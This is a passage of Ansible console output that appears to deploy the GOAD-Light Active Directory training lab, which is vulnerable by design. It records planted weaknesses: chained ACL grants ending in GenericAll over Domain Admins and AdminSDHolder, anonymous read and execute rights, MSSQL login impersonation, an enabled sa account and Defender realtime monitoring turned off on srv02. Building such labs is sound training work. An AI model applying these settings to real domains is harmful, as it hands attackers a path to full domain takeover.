ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [ACL inside AD] ***************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: acl : set acl on dc01]
 [started TASK: acl : set acl on dc02]

TASK [acl : set acl] ***************************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'forcechangepassword_tywin_jaime', 'value': {'for': 'tywin.lannister', 'to': 'jaime.lannister', 'right': 'Ext-User-Force-Change-Password', 'inheritance': 'None'}})
changed: [dc02] => (item={'key': 'anonymous_rpc', 'value': {'for': 'NT AUTHORITY\\ANONYMOUS LOGON', 'to': 'DC=North,DC=sevenkingdoms,DC=local', 'right': 'ReadProperty', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'GenericWrite_on_user_jaimie_joffrey', 'value': {'for': 'jaime.lannister', 'to': 'joffrey.baratheon', 'right': 'GenericWrite', 'inheritance': 'None'}})
changed: [dc02] => (item={'key': 'anonymous_rpc2', 'value': {'for': 'NT AUTHORITY\\ANONYMOUS LOGON', 'to': 'DC=North,DC=sevenkingdoms,DC=local', 'right': 'GenericExecute', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'Writedacl_joffrey_tyron', 'value': {'for': 'joffrey.baratheon', 'to': 'tyron.lannister', 'right': 'WriteDacl', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'self-self-membership-on-group_tyron_small_council', 'value': {'for': 'tyron.lannister', 'to': 'Small Council', 'right': 'Ext-Self-Self-Membership', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'addmember_smallcouncil_DragonStone', 'value': {'for': 'Small Council', 'to': 'DragonStone', 'right': 'Ext-Write-Self-Membership', 'inheritance': 'All'}})
changed: [dc01] => (item={'key': 'write_owner_dragonstone_kingsguard', 'value': {'for': 'DragonStone', 'to': 'KingsGuard', 'right': 'WriteOwner', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_kingsguard_stanis', 'value': {'for': 'KingsGuard', 'to': 'stannis.baratheon', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_stanis_dc', 'value': {'for': 'stannis.baratheon', 'to': 'kingslanding$', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_group_acrrosdom_dc', 'value': {'for': 'AcrossTheNarrowSea', 'to': 'kingslanding$', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_varys_domadmin', 'value': {'for': 'lord.varys', 'to': 'Domain Admins', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'GenericAll_varys_domadmin_holder', 'value': {'for': 'lord.varys', 'to': 'CN=AdminSDHolder,CN=System,DC=sevenkingdoms,DC=local', 'right': 'GenericAll', 'inheritance': 'None'}})
changed: [dc01] => (item={'key': 'WriteDACL_renly_Crownlands', 'value': {'for': 'renly.baratheon', 'to': 'OU=Crownlands,DC=sevenkingdoms,DC=local', 'right': 'WriteDacl', 'inheritance': 'None'}})

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=8    changed=1    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=3    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : servers.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [srv02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Install IIS] *****************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Enable update service on srv02]

TASK [iis : Enable update service] *************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Install IIS Management Features on srv02]

TASK [iis : Install IIS Management Features] ***************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components) on srv02]

TASK [iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components)] *******************************************************************************************************
changed: [srv02]
 [started TASK: iis : Install IIS 6 Compatibility Features on srv02]

TASK [iis : Install IIS 6 Compatibility Features] **********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Install IIS Web-Server with sub features and management tools on srv02]

TASK [iis : Install IIS Web-Server with sub features and management tools] *********************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : default-website-index on srv02]

TASK [iis : default-website-index] *************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: iis : Reboot if installing Web-Server feature requires it on srv02]

PLAY [Install MSSQL Express] *******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Reboot before install (long timeout in case of update) on srv02]

TASK [mssql : Reboot before install (long timeout in case of update)] **************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Set download_url on srv02]

TASK [mssql : Set download_url] ****************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set connection method on srv02]

TASK [mssql : Set connection method] ***********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_instance on srv02]

TASK [mssql : Set mssql_service_instance] ******************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_name on srv02]

TASK [mssql : Set mssql_service_name] **********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Display mssql variables in use on srv02]

TASK [mssql : Display mssql variables in use] **************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": [
        "MSSQL version        : MSSQL_2019",
        "MSSQL service name   : MSSQL$SQLEXPRESS",
        "MSSQL download url   : https://download.microsoft.com/download/7/f/8/7f8a9c43-8c8a-4f7c-9f92-83c18d96b681/SQL2019-SSEI-Expr.exe",
        "MSSQL instance       : SQLEXPRESS",
        "MSSQL connection use : -E"
    ]
}
 [started TASK: mssql : create a directory for installer download on srv02]

TASK [mssql : create a directory for installer download] ***************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : create a directory for installer extraction on srv02]

TASK [mssql : create a directory for installer extraction] *************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : create a directory for media extraction on srv02]

TASK [mssql : create a directory for media extraction] *****************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : create the configuration file on srv02]

TASK [mssql : create the configuration file] ***************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : check downloaded file exists on srv02]

TASK [mssql : check downloaded file exists] ****************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : get the installer on srv02]

TASK [mssql : get the installer] ***************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Add service account to Log on as a service on srv02]

TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : check MSSQL service already exist (if failed service do not exist, launch install) on srv02]

TASK [mssql : check MSSQL service already exist (if failed service do not exist, launch install)] **********************************************************************************************************
ok: [srv02]
 [started TASK: mssql : debug on srv02]

TASK [mssql : debug] ***************************************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": {
        "changed": false,
        "exists": false,
        "failed": false,
        "failed_when_result": false
    }
}
 [started TASK: mssql : Install the database on srv02]
FAILED - RETRYING: [srv02]: Install the database (3 retries left).
FAILED - RETRYING: [srv02]: Install the database (2 retries left).
FAILED - RETRYING: [srv02]: Install the database (1 retries left).

TASK [mssql : Install the database] ************************************************************************************************************************************************************************
fatal: [srv02]: FAILED! => {"attempts": 3, "changed": true, "cmd": "c:\\setup\\mssql\\sql_installer.exe /configurationfile=c:\\setup\\mssql\\sql_conf.ini /IACCEPTSQLSERVERLICENSETERMS /MEDIAPATH=c:\\setup\\mssql\\media /QUIET /HIDEPROGRESSBAR", "delta": "0:00:35.187290", "end": "2026-02-12 16:17:02.429965", "msg": "non-zero return code", "rc": 2226323458, "start": "2026-02-12 16:16:27.242675", "stderr": "", "stderr_lines": [], "stdout": "Microsoft (R) SQL Server Installer\r\nCopyright (c) 2019 Microsoft.  All rights reserved.\r\n\r\nDownloading install package...\r\n\r\n\r\nOperation finished with result: Failure\r\n\r\nOops...\r\n\r\nUnable to install SQL Server (setup.exe).\r\n\r\n      Exit code (Decimal): -2068643838\r\n      Exit message: No features were installed during the setup execution. The requested features may already be installed. Please review the summary.txt log for further details.\r\n\r\n  SQL SERVER INSTALL LOG FOLDER\r\n      c:\\Program Files\\Microsoft SQL Server\\150\\Setup Bootstrap\\Log\\20260212_081633\r\n\r\n", "stdout_lines": ["Microsoft (R) SQL Server Installer", "Copyright (c) 2019 Microsoft.  All rights reserved.", "", "Downloading install package...", "", "", "Operation finished with result: Failure", "", "Oops...", "", "Unable to install SQL Server (setup.exe).", "", "      Exit code (Decimal): -2068643838", "      Exit message: No features were installed during the setup execution. The requested features may already be installed. Please review the summary.txt log for further details.", "", "  SQL SERVER INSTALL LOG FOLDER", "      c:\\Program Files\\Microsoft SQL Server\\150\\Setup Bootstrap\\Log\\20260212_081633", ""]}

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=26   changed=13   unreachable=0    failed=1    skipped=1    rescued=0    ignored=0   

[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Install IIS] *****************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Enable update service on srv02]

TASK [iis : Enable update service] *************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Install IIS Management Features on srv02]

TASK [iis : Install IIS Management Features] ***************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components) on srv02]

TASK [iis : Add SYSTEM allow rights to machine keys (required for installation of IIS 6 components)] *******************************************************************************************************
ok: [srv02]
 [started TASK: iis : Install IIS 6 Compatibility Features on srv02]

TASK [iis : Install IIS 6 Compatibility Features] **********************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Install IIS Web-Server with sub features and management tools on srv02]

TASK [iis : Install IIS Web-Server with sub features and management tools] *********************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Create directory on srv02]

TASK [iis : Create directory] ******************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : default-website-index on srv02]

TASK [iis : default-website-index] *************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: iis : Reboot if installing Web-Server feature requires it on srv02]

PLAY [Install MSSQL Express] *******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Reboot before install (long timeout in case of update) on srv02]

TASK [mssql : Reboot before install (long timeout in case of update)] **************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Set download_url on srv02]

TASK [mssql : Set download_url] ****************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set connection method on srv02]

TASK [mssql : Set connection method] ***********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_instance on srv02]

TASK [mssql : Set mssql_service_instance] ******************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Set mssql_service_name on srv02]

TASK [mssql : Set mssql_service_name] **********************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Display mssql variables in use on srv02]

TASK [mssql : Display mssql variables in use] **************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": [
        "MSSQL version        : MSSQL_2019",
        "MSSQL service name   : MSSQL$SQLEXPRESS",
        "MSSQL download url   : https://download.microsoft.com/download/7/f/8/7f8a9c43-8c8a-4f7c-9f92-83c18d96b681/SQL2019-SSEI-Expr.exe",
        "MSSQL instance       : SQLEXPRESS",
        "MSSQL connection use : -E"
    ]
}
 [started TASK: mssql : create a directory for installer download on srv02]

TASK [mssql : create a directory for installer download] ***************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : create a directory for installer extraction on srv02]

TASK [mssql : create a directory for installer extraction] *************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : create a directory for media extraction on srv02]

TASK [mssql : create a directory for media extraction] *****************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : create the configuration file on srv02]

TASK [mssql : create the configuration file] ***************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : check downloaded file exists on srv02]

TASK [mssql : check downloaded file exists] ****************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : get the installer on srv02]
 [started TASK: mssql : Add service account to Log on as a service on srv02]

TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : check MSSQL service already exist (if failed service do not exist, launch install) on srv02]

TASK [mssql : check MSSQL service already exist (if failed service do not exist, launch install)] **********************************************************************************************************
ok: [srv02]
 [started TASK: mssql : debug on srv02]

TASK [mssql : debug] ***************************************************************************************************************************************************************************************
ok: [srv02] => {
    "msg": {
        "can_pause_and_continue": true,
        "changed": false,
        "depended_by": [
            "SQLAgent$SQLEXPRESS"
        ],
        "dependencies": [
            "KEYISO"
        ],
        "description": "Provides storage, processing and controlled access of data, and rapid transaction processing.",
        "desktop_interact": false,
        "display_name": "SQL Server (SQLEXPRESS)",
        "exists": true,
        "failed": false,
        "failed_when_result": false,
        "name": "MSSQL$SQLEXPRESS",
        "path": "\"c:\\Program Files\\Microsoft SQL Server\\MSSQL15.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS",
        "start_mode": "auto",
        "state": "running",
        "username": "north.sevenkingdoms.local\\sql_svc"
    }
}
 [started TASK: mssql : Install the database on srv02]
 [started TASK: mssql : Add or update registry for ip port on srv02]
 [started TASK: mssql : Add or update registry for ip port on srv02]

TASK [mssql : Add or update registry for ip port] **********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Reboot on srv02]

TASK [mssql : Reboot] **************************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Firewall | Allow MSSQL through Firewall on srv02]

TASK [mssql : Firewall | Allow MSSQL through Firewall] *****************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Firewall | Allow MSSQL discover through Firewall on srv02]

TASK [mssql : Firewall | Allow MSSQL discover through Firewall] ********************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Be sure service is started on srv02]

TASK [mssql : Be sure service is started] ******************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Wait for port 1433 to become open on the host, start checking every 5 seconds on srv02]

TASK [mssql : Wait for port 1433 to become open on the host, start checking every 5 seconds] ***************************************************************************************************************
ok: [srv02]
 [started TASK: mssql : Add MSSQL admin on srv02]

TASK [mssql : Add MSSQL admin] *****************************************************************************************************************************************************************************
changed: [srv02] => (item=NORTH\jon.snow)
 [started TASK: mssql : Add IMPERSONATE on login on srv02]

TASK [mssql : Add IMPERSONATE on login] ********************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'NORTH\\samwell.tarly', 'value': 'sa'})
changed: [srv02] => (item={'key': 'NORTH\\brandon.stark', 'value': 'NORTH\\jon.snow'})
 [started TASK: mssql : Add IMPERSONATE on user on srv02]

TASK [mssql : Add IMPERSONATE on user] *********************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'arya_master_dbo', 'value': {'user': 'NORTH\\arya.stark', 'db': 'master', 'impersonate': 'dbo'}})
changed: [srv02] => (item={'key': 'arya_dbms_dbo', 'value': {'user': 'NORTH\\arya.stark', 'db': 'msdb', 'impersonate': 'dbo'}})
 [started TASK: mssql : Enable sa account on srv02]

TASK [mssql : Enable sa account] ***************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : enable MSSQL authentication and windows authent on srv02]

TASK [mssql : enable MSSQL authentication and windows authent] *********************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql : Restart service MSSQL on srv02]

TASK [mssql : Restart service MSSQL] ***********************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql_link : Create SQL Linked server and enable RPC on srv02]
 [started TASK: mssql_link : create logins on srv02]
 [started TASK: mssql_link : default login impersonation on srv02]

PLAY [Install SQL Server Management Studio] ****************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql_ssms : check SQL Server Manager Studio installer exists on srv02]

TASK [mssql_ssms : check SQL Server Manager Studio installer exists] ***************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql_ssms : get the installer on srv02]

TASK [mssql_ssms : get the installer] **********************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql_ssms : check SSMS installation already done on srv02]

TASK [mssql_ssms : check SSMS installation already done] ***************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql_ssms : Install SSMS on srv02]

TASK [mssql_ssms : Install SSMS] ***************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql_ssms : Reboot after install on srv02]

TASK [mssql_ssms : Reboot after install] *******************************************************************************************************************************************************************
changed: [srv02]
[WARNING]: Could not match supplied host pattern, ignoring: mssql_reporting

PLAY [Install SQL Server reporting] ************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Install Webdav] **************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: webdav : Ensure WebDAV client feature is installed on srv02]

TASK [webdav : Ensure WebDAV client feature is installed] **************************************************************************************************************************************************
changed: [srv02]
 [started TASK: webdav : Reboot after installing WebDAV client feature on srv02]

TASK [webdav : Reboot after installing WebDAV client feature] **********************************************************************************************************************************************
changed: [srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=46   changed=16   unreachable=0    failed=0    skipped=7    rescued=0    ignored=0   

[*] Run playbook : security.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
security.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Setup enable defender] *******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: settings/windows_defender : Install windows defender on dc01]
 [started TASK: settings/windows_defender : Install windows defender on dc02]

TASK [settings/windows_defender : Install windows defender] ************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: settings/windows_defender : Reboot if needed on dc01]
 [started TASK: settings/windows_defender : Reboot if needed on dc02]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc01]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [dc02]
changed: [dc01]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc01]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [dc01]
changed: [dc02]
 [started TASK: settings/windows_defender : Disable network drive scanning on dc01]
 [started TASK: settings/windows_defender : Disable network drive scanning on dc02]
 [started TASK: settings/windows_defender : Disable realtime monitoring on dc01]
 [started TASK: settings/windows_defender : Disable realtime monitoring on dc02]

PLAY [Setup disable defender] ******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/windows_defender : Install windows defender on srv02]

TASK [settings/windows_defender : Install windows defender] ************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/windows_defender : Reboot if needed on srv02]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on srv02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [srv02]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on srv02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [srv02]
 [started TASK: settings/windows_defender : Disable network drive scanning on srv02]

TASK [settings/windows_defender : Disable network drive scanning] ******************************************************************************************************************************************
changed: [srv02]
 [started TASK: settings/windows_defender : Disable realtime monitoring on srv02]

TASK [settings/windows_defender : Disable realtime monitoring] *********************************************************************************************************************************************
changed: [srv02]

PLAY [Setup security with tasks] ***************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: include_role : security/{{secu}} on dc01]
 [started TASK: include_role : security/{{secu}} on dc02]
 [started TASK: include_role : security/{{secu}} on srv02]

TASK [include_role : security/{{secu}}] ********************************************************************************************************************************************************************
 [started TASK: security/account_is_sensitive : Account is sensitive on dc01]

TASK [security/account_is_sensitive : Account is sensitive] ************************************************************************************************************************************************
